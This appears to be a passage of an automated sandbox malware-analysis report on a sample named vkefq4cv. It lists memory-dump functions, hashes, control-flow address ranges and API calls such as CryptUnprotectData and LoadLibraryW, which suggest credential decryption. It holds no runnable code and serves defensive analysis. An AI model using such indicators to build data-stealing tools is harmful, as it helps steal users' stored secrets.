                                                                                                      • Instruction Fuzzy Hash: 7F112971E1992D9FDBA8EF98C8A56ACB7B2FF5A340F110169D00DD72A2CE346941CB40
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00007FFD9B9A0A98 Relevance: .1, Instructions: 68COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1824290707.00007FFD9B9A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_7ffd9b9a0000_vkefq4cv.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 516fa0fcf563e7502b36ef048a77f769a315f4307c6a5fa9cfde37c4e665117e
                                                                                                      • Instruction ID: 848d1a153d7bc92473c8bf97e9373e5d115ff623f131e1092214b1f9bbddc138
                                                                                                      • Opcode Fuzzy Hash: 516fa0fcf563e7502b36ef048a77f769a315f4307c6a5fa9cfde37c4e665117e
                                                                                                      • Instruction Fuzzy Hash: 1711B661169BC66FC7429BB854261EABFE0AF8623071781FDC0858B26AC69C0C47C721
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00007FFD9B9A3E25 Relevance: .1, Instructions: 66COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1824290707.00007FFD9B9A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_7ffd9b9a0000_vkefq4cv.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: c0c4eb1f9427d98a312bc2194077f69165b9a5f07f5b9b7c1a86ce904bac9962
                                                                                                      • Instruction ID: 772ac662fc061a88d4e3143e9f68a1dac6c4e92d2aa22e32d88ace913fbd7700
                                                                                                      • Opcode Fuzzy Hash: c0c4eb1f9427d98a312bc2194077f69165b9a5f07f5b9b7c1a86ce904bac9962
                                                                                                      • Instruction Fuzzy Hash: 4E11C13155E7CD4FD752AB708D252E63BA0EF06310F4605BAD408C61E2DA6CA608C752
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00007FFD9B9A08DA Relevance: .1, Instructions: 62COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1824290707.00007FFD9B9A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_7ffd9b9a0000_vkefq4cv.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 1678aedde1a5041114cd5356c17fb708ce15d7af06989f1077b0fb5d4549885c
                                                                                                      • Instruction ID: 25a021820a233e4d8e28693eaef1096a24565ebc5485a59ac14954f8bb94e86c
                                                                                                      • Opcode Fuzzy Hash: 1678aedde1a5041114cd5356c17fb708ce15d7af06989f1077b0fb5d4549885c
                                                                                                      • Instruction Fuzzy Hash: 5211E97063690E9FD785DBB888666B9BFE0FF8531070244B9C01DCB2A1DA6C5C46C751
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00007FFD9B9A1A52 Relevance: .0, Instructions: 48COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1824290707.00007FFD9B9A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_7ffd9b9a0000_vkefq4cv.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: e0e3f67ae3f45f92ecf6f6ea8b951e0b3115bc0136ecb8ca8545403f50b2d388
                                                                                                      • Instruction ID: 9da7a544c6110d606f1d1d80acda997ac1a238874a0a2a1d7e5ac2c0aee44186
                                                                                                      • Opcode Fuzzy Hash: e0e3f67ae3f45f92ecf6f6ea8b951e0b3115bc0136ecb8ca8545403f50b2d388
                                                                                                      • Instruction Fuzzy Hash: E001A571A1892D9FEFA4EB98D855AEDB7B1FF68300F50426AD00DE3265DE34A941CB40
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00007FFD9B9A4B4A Relevance: .0, Instructions: 30COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1824290707.00007FFD9B9A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_7ffd9b9a0000_vkefq4cv.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: ac408666a1cb5e2d73458fb60c420996a955a32be679cd04086df66c4570fcbe
                                                                                                      • Instruction ID: b69c88e0235680669064c1902f2eb7bf91ca294b05cebd11d9798c02187b8963
                                                                                                      • Opcode Fuzzy Hash: ac408666a1cb5e2d73458fb60c420996a955a32be679cd04086df66c4570fcbe
                                                                                                      • Instruction Fuzzy Hash: D3F0E530A0621D5BDB588BF0D4217FEBBB0EF42311F11007DD40AB32C2C9685A54CA32
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00007FFD9B9A0B3E Relevance: .0, Instructions: 29COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1824290707.00007FFD9B9A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_7ffd9b9a0000_vkefq4cv.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 4c71c8d3532de62bb8cdbff4302ae04c4011b246200cd34637faaef3f333fc52
                                                                                                      • Instruction ID: f4ef6028fc3377fb942c3a3073fa61388d248a588d488ded6fa712bdf280748f
                                                                                                      • Opcode Fuzzy Hash: 4c71c8d3532de62bb8cdbff4302ae04c4011b246200cd34637faaef3f333fc52
                                                                                                      • Instruction Fuzzy Hash: 21F0A070A59A0E8FDB40EFB48869AADBFF0FF44300F11047DC01ACB2A5DE281881CB01
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00007FFD9B9A2733 Relevance: .0, Instructions: 28COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1824290707.00007FFD9B9A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_7ffd9b9a0000_vkefq4cv.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 693ada9da0799bc1bc6d75ebc3dd499bdc546a915b70d3ec56ccfba56ca49741
                                                                                                      • Instruction ID: 3d23793f4ed55bd11c177ac65c457e9f4d9b0a2fcef1e3f818f5a812881c04e2
                                                                                                      • Opcode Fuzzy Hash: 693ada9da0799bc1bc6d75ebc3dd499bdc546a915b70d3ec56ccfba56ca49741
                                                                                                      • Instruction Fuzzy Hash: 2BE08622B2DC2E0BE654A19C64502E453C2D7A82A0B1003B3D00DC3299DC19E94343C0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00007FFD9B9A0F8D Relevance: .0, Instructions: 19COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1824290707.00007FFD9B9A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_7ffd9b9a0000_vkefq4cv.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: e1cbf291c09360e29bab03cc79d26413cd54e451f0bf61c4e621fdd437804c4a
                                                                                                      • Instruction ID: a9d044faf333d3d54043ab0f6d21c214cbd3c235a0de651f2fc80bb1843f9393
                                                                                                      • Opcode Fuzzy Hash: e1cbf291c09360e29bab03cc79d26413cd54e451f0bf61c4e621fdd437804c4a
                                                                                                      • Instruction Fuzzy Hash: 41E0EC70A6591EAFD7E5EB7488297F8BBE0FF59340F0144FA841DC76A1DE241D898B00
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Non-executed Functions

                                                                                                      Function 00007FFD9B9A06F0 Relevance: 5.1, Strings: 4, Instructions: 101COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1824290707.00007FFD9B9A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_7ffd9b9a0000_vkefq4cv.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: L_^=$L_^>$L_^?$L_^@
                                                                                                      • API String ID: 0-2868325183
                                                                                                      • Opcode ID: e95141f434f9991fbcc360e20ea75c866b31bfbf587b748225e8c677ba0dac08
                                                                                                      • Instruction ID: 955ecef61f80802e61a4063ee2c90d7462bc66f65df7cc0d723f7c65048b6be1
                                                                                                      • Opcode Fuzzy Hash: e95141f434f9991fbcc360e20ea75c866b31bfbf587b748225e8c677ba0dac08
                                                                                                      • Instruction Fuzzy Hash: 46215AB37281251AD3057BBD7856DDE3764DF81330B0959BBD1AE8A183CE25208ECBC5
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Execution Graph

                                                                                                      Execution Coverage:17%
                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                      Signature Coverage:18.8%
                                                                                                      Total number of Nodes:16
                                                                                                      Total number of Limit Nodes:1
                                                                                                      execution_graph 13643 7ffd9b9784b1 13645 7ffd9b9784df CryptUnprotectData 13643->13645 13646 7ffd9b9786e9 13645->13646 13627 7ffd9b9771bd 13628 7ffd9b9771c3 13627->13628 13631 7ffd9b9762d0 13628->13631 13630 7ffd9b977237 13634 7ffd9b975f48 13631->13634 13633 7ffd9b9762d9 13633->13630 13634->13633 13636 7ffd9b976a00 13634->13636 13635 7ffd9b976c2c LoadLibraryW 13637 7ffd9b976c8c 13635->13637 13636->13633 13636->13635 13638 7ffd9b976b1b 13636->13638 13637->13633 13638->13633 13639 7ffd9b976b88 13640 7ffd9b976b8f LoadLibraryW 13639->13640 13642 7ffd9b976c8c 13640->13642

                                                                                                      Executed Functions

                                                                                                      Function 00007FFD9B9784B1 Relevance: 1.8, APIs: 1, Instructions: 254encryptionCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 701 7ffd9b9784b1-7ffd9b9784f5 703 7ffd9b97853f-7ffd9b9785d6 701->703 704 7ffd9b9784f7-7ffd9b97853a 701->704 707 7ffd9b9785d8-7ffd9b9785dc 703->707 708 7ffd9b978647-7ffd9b97865c 703->708 704->703 711 7ffd9b9785de-7ffd9b9785f9 707->711 712 7ffd9b97862b-7ffd9b978646 707->712 710 7ffd9b978664-7ffd9b9786e7 CryptUnprotectData 708->710 713 7ffd9b9786ef-7ffd9b978761 710->713 714 7ffd9b9786e9 710->714 711->712 712->708 714->713
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.4411338309.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_7ffd9b970000_vkefq4cv.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CryptDataUnprotect
                                                                                                      • String ID:
                                                                                                      • API String ID: 834300711-0
                                                                                                      • Opcode ID: 7e4528b8d686f6bb61b2b5b7c90d0021ecbf05e29040986980cbecbb50a4877b
                                                                                                      • Instruction ID: ebdaac709d0823b17279c0146e5a8c0f24dcc9a7df4376bc8fbfc9f98a51b610
                                                                                                      • Opcode Fuzzy Hash: 7e4528b8d686f6bb61b2b5b7c90d0021ecbf05e29040986980cbecbb50a4877b
                                                                                                      • Instruction Fuzzy Hash: A0815B70E18A5D8FDBA8DF18C895BE9B7F1FB59300F0042AAD449E3251DB75A9848F41
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00007FFD9B9785FD Relevance: 1.6, APIs: 1, Instructions: 118encryptionCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 806 7ffd9b9785fd-7ffd9b9786e7 CryptUnprotectData 811 7ffd9b9786ef-7ffd9b978761 806->811 812 7ffd9b9786e9 806->812 812->811
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.4411338309.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_7ffd9b970000_vkefq4cv.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CryptDataUnprotect
                                                                                                      • String ID:
                                                                                                      • API String ID: 834300711-0
                                                                                                      • Opcode ID: c3881c51f463b490d339e882bbdd6d72c8aa1a497968fa09899d2287fbe916f8
                                                                                                      • Instruction ID: 98ccdb9ad51403df795bfda0a047397b92dea7c45df52c8fad5a19197375fb86
                                                                                                      • Opcode Fuzzy Hash: c3881c51f463b490d339e882bbdd6d72c8aa1a497968fa09899d2287fbe916f8
                                                                                                      • Instruction Fuzzy Hash: 5D41B730A18A1D8FDBA8DF18C895BE9B7B1FB59300F0146A9D44DE3255DB74AA84CF41
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00007FFD9B975F48 Relevance: 1.9, APIs: 1, Instructions: 364COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.4411338309.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_7ffd9b970000_vkefq4cv.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 524aaa23c04715c661194df004783ca30df59e261b849a930d1c19edf018366b
                                                                                                      • Instruction ID: f1cc17e7ff153e61551ba7b163927c10f1d53f96bc8e9ee4b77a7c2f85d3a583
                                                                                                      • Opcode Fuzzy Hash: 524aaa23c04715c661194df004783ca30df59e261b849a930d1c19edf018366b
                                                                                                      • Instruction Fuzzy Hash: 48B1B130A1DA0D8FDB68DF98D895AA9B7F1FF5A310F15417ED04ED3262DA35A842CB40
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00007FFD9B976B88 Relevance: 1.7, APIs: 1, Instructions: 160libraryCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 796 7ffd9b976b88-7ffd9b976c10 800 7ffd9b976c12-7ffd9b976c29 796->800 801 7ffd9b976c2c-7ffd9b976c8a LoadLibraryW 796->801 800->801 802 7ffd9b976c92-7ffd9b976ce4 801->802 803 7ffd9b976c8c 801->803 803->802
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.4411338309.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_7ffd9b970000_vkefq4cv.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: LibraryLoad
                                                                                                      • String ID:
                                                                                                      • API String ID: 1029625771-0
                                                                                                      • Opcode ID: 0a6ce025fd969849706a88d28a03e1c19c5aa4fd28ad9a232c56fbe9284ffd93
                                                                                                      • Instruction ID: 6b89e12540bdcc902b888d3f660feee386d4dab47fa1a4ec39597fbcd9b38d51
                                                                                                      • Opcode Fuzzy Hash: 0a6ce025fd969849706a88d28a03e1c19c5aa4fd28ad9a232c56fbe9284ffd93
                                                                                                      • Instruction Fuzzy Hash: A551F870A08A1C8FDB98EF98D899BE9BBF1FB59311F10416ED00DE7251DB71A985CB40
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Execution Graph

                                                                                                      Execution Coverage:18.4%
                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                      Signature Coverage:0%
                                                                                                      Total number of Nodes:6
                                                                                                      Total number of Limit Nodes:0
                                                                                                      execution_graph 13880 7ffd9b976c81 13881 7ffd9b976c9b LoadLibraryW 13880->13881 13883 7ffd9b976dac 13881->13883 13884 7ffd9b9784a1 13885 7ffd9b9784cf CryptUnprotectData 13884->13885 13887 7ffd9b9786d9 13885->13887

                                                                                                      Executed Functions

                                                                                                      Function 00007FFD9B9784A1 Relevance: 1.8, APIs: 1, Instructions: 332encryptionCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000012.00000002.2078687625.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_18_2_7ffd9b970000_vkefq4cv.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CryptDataUnprotect
                                                                                                      • String ID:
                                                                                                      • API String ID: 834300711-0
                                                                                                      • Opcode ID: 6c53b44100e0fe3a450e4aab560d0a093424d46f1c5f24ac28121b5d20bbce97
                                                                                                      • Instruction ID: f422de9b7ee96bd28a16f7a12d90e87969ae9112dd7ee46ad54ca07bf8d20d96
                                                                                                      • Opcode Fuzzy Hash: 6c53b44100e0fe3a450e4aab560d0a093424d46f1c5f24ac28121b5d20bbce97
                                                                                                      • Instruction Fuzzy Hash: 29B14070E1861D8FDBA8DF18C895BE9B7F1FB59310F0042AAD40DE3251DB75AA858F40
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00007FFD9B976C81 Relevance: 1.7, APIs: 1, Instructions: 183libraryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000012.00000002.2078687625.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_18_2_7ffd9b970000_vkefq4cv.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: LibraryLoad
                                                                                                      • String ID:
                                                                                                      • API String ID: 1029625771-0
                                                                                                      • Opcode ID: 05a12b71d90c389a5061528e5592353ad37dd8e1589fcd403bab3616e3cd9874
                                                                                                      • Instruction ID: 653cfe6e7c8246021d1bb0154421c99c5011c46fc0ecc5ba0732b57e853cd10f
                                                                                                      • Opcode Fuzzy Hash: 05a12b71d90c389a5061528e5592353ad37dd8e1589fcd403bab3616e3cd9874
                                                                                                      • Instruction Fuzzy Hash: B6518E70908A1C8FDB98EF98D899BE9BBF0FB59311F00416ED00DE7261DB759985CB40
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Execution Graph

                                                                                                      Execution Coverage:14.9%
                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                      Signature Coverage:0%
                                                                                                      Total number of Nodes:5
                                                                                                      Total number of Limit Nodes:1
                                                                                                      execution_graph 4428 7ffd9b9869da 4430 7ffd9b986a14 4428->4430 4429 7ffd9b986c1c LoadLibraryW 4431 7ffd9b986c7c 4429->4431 4430->4429 4432 7ffd9b986b0b 4430->4432

                                                                                                      Executed Functions

                                                                                                      Function 00007FFD9B9869DA Relevance: 1.9, APIs: 1, Instructions: 363COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 201 7ffd9b9869da-7ffd9b986a0e 202 7ffd9b986a14-7ffd9b986a19 201->202 203 7ffd9b986b3c-7ffd9b986b46 201->203 204 7ffd9b986a1f-7ffd9b986a37 202->204 205 7ffd9b986b0b-7ffd9b986b20 202->205 209 7ffd9b986b47-7ffd9b986c00 203->209 207 7ffd9b986a4b-7ffd9b986a6f 204->207 208 7ffd9b986a39-7ffd9b986a4a 204->208 207->209 212 7ffd9b986a75-7ffd9b986a80 207->212 208->207 224 7ffd9b986c02-7ffd9b986c19 209->224 225 7ffd9b986c1c-7ffd9b986c7a LoadLibraryW 209->225 212->205 214 7ffd9b986a86-7ffd9b986a8e 212->214 214->209 215 7ffd9b986a94-7ffd9b986aa0 214->215 217 7ffd9b986af3-7ffd9b986afb 215->217 218 7ffd9b986aa2-7ffd9b986aae 215->218 217->209 221 7ffd9b986afd-7ffd9b986b05 217->221 218->209 219 7ffd9b986ab4-7ffd9b986ac8 218->219 222 7ffd9b986b21-7ffd9b986b26 219->222 223 7ffd9b986aca-7ffd9b986add 219->223 221->205 221->214 229 7ffd9b986ae1-7ffd9b986af1 222->229 223->229 224->225 227 7ffd9b986c82-7ffd9b986cd4 225->227 228 7ffd9b986c7c 225->228 228->227 229->217 233 7ffd9b986b28-7ffd9b986b3b 229->233
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000002A.00000002.2317144357.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_42_2_7ffd9b980000_vkefq4cv.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 7d3b4d675379b651e45ceb2557fecdc9ab7b3f8176ed0cdef746ada81e33898b
                                                                                                      • Instruction ID: 481e527f09d10117876f0e29c19e6fd5ad1a29423720c756d5d84939f9961fa6
                                                                                                      • Opcode Fuzzy Hash: 7d3b4d675379b651e45ceb2557fecdc9ab7b3f8176ed0cdef746ada81e33898b
                                                                                                      • Instruction Fuzzy Hash: BFB1C130A1DA0D8FDB68DF98D895AA9BBF1FF59314F10417ED04EC7262DA35A846CB40
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Execution Graph

                                                                                                      Execution Coverage:14.2%
                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                      Signature Coverage:0%
                                                                                                      Total number of Nodes:5
                                                                                                      Total number of Limit Nodes:1
                                                                                                      execution_graph 2903 7ffd9b966b09 2904 7ffd9b966b44 2903->2904 2905 7ffd9b966d4c LoadLibraryW 2904->2905 2907 7ffd9b966c3b 2904->2907 2906 7ffd9b966dac 2905->2906

                                                                                                      Executed Functions

                                                                                                      Function 00007FFD9B966B09 Relevance: 1.9, APIs: 1, Instructions: 365libraryCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000002C.00000002.3022144022.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_44_2_7ffd9b960000_vkefq4cv.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: LibraryLoad
                                                                                                      • String ID:
                                                                                                      • API String ID: 1029625771-0
                                                                                                      • Opcode ID: 2c24db07aab678debe8b8ba3d7d3de779a99ef58e52674e41af98b0a4296da6b
                                                                                                      • Instruction ID: 39828c84d56ca249c73cbaf1452e14b6a0104001753113202972af9b4417ae4c
                                                                                                      • Opcode Fuzzy Hash: 2c24db07aab678debe8b8ba3d7d3de779a99ef58e52674e41af98b0a4296da6b
                                                                                                      • Instruction Fuzzy Hash: 7FB1A030A1DA0D8FDB68DF58D895BA8BBF1FF59310F14016ED04ED7262DA35A846CB41
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Execution Graph

                                                                                                      Execution Coverage:12.3%
                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                      Signature Coverage:0%
                                                                                                      Total number of Nodes:8
                                                                                                      Total number of Limit Nodes:0
                                                                                                      execution_graph 2905 7ffd9b996898 2906 7ffd9b9968db LoadLibraryW 2905->2906 2908 7ffd9b99699c 2906->2908 2909 7ffd9b9962e9 2912 7ffd9b99630d 2909->2912 2910 7ffd9b99634a 2911 7ffd9b99693c LoadLibraryW 2913 7ffd9b99699c 2911->2913 2912->2910 2912->2911

                                                                                                      Executed Functions

                                                                                                      Function 00007FFD9B9962E9 Relevance: 4.3, APIs: 1, Strings: 1, Instructions: 837COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000002D.00000002.3590481242.00007FFD9B990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B990000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_45_2_7ffd9b990000_vkefq4cv.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: L_^
                                                                                                      • API String ID: 0-3811526842
                                                                                                      • Opcode ID: bccf717a1a41f638d836235d1dd18ad397882737f662211e62c5a5597eb950ac
                                                                                                      • Instruction ID: efa8d3e86fd26ab1bb3f634bf3ad67e8eff02aa5fa0baa99dbdb5458bd9fa41c
                                                                                                      • Opcode Fuzzy Hash: bccf717a1a41f638d836235d1dd18ad397882737f662211e62c5a5597eb950ac
                                                                                                      • Instruction Fuzzy Hash: B8C1D231A1DA0D8FDBA9DF58D895AA87BF0FF56310F0441BED04DC72A2DA35A846CB41
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00007FFD9B996898 Relevance: 1.7, APIs: 1, Instructions: 156libraryCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 593 7ffd9b996898-7ffd9b996920 596 7ffd9b99693c-7ffd9b99699a LoadLibraryW 593->596 597 7ffd9b996922-7ffd9b996939 593->597 598 7ffd9b99699c 596->598 599 7ffd9b9969a2-7ffd9b9969f4 596->599 597->596 598->599
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000002D.00000002.3590481242.00007FFD9B990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B990000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_45_2_7ffd9b990000_vkefq4cv.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: LibraryLoad
                                                                                                      • String ID:
                                                                                                      • API String ID: 1029625771-0
                                                                                                      • Opcode ID: 57cdd435a7331c816b4020a5d30e532d28ac4866cd15eb027aeb20e563ad90da
                                                                                                      • Instruction ID: 18ddc29c45fea65db4833ce0c34db5257c85d8bc56dbcb68a56a8a74e8428933
                                                                                                      • Opcode Fuzzy Hash: 57cdd435a7331c816b4020a5d30e532d28ac4866cd15eb027aeb20e563ad90da
                                                                                                      • Instruction Fuzzy Hash: 7C411770A08A1C8FDB98EF98D899BE9BBF1FB59301F10416ED00DE7251DB759985CB40
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%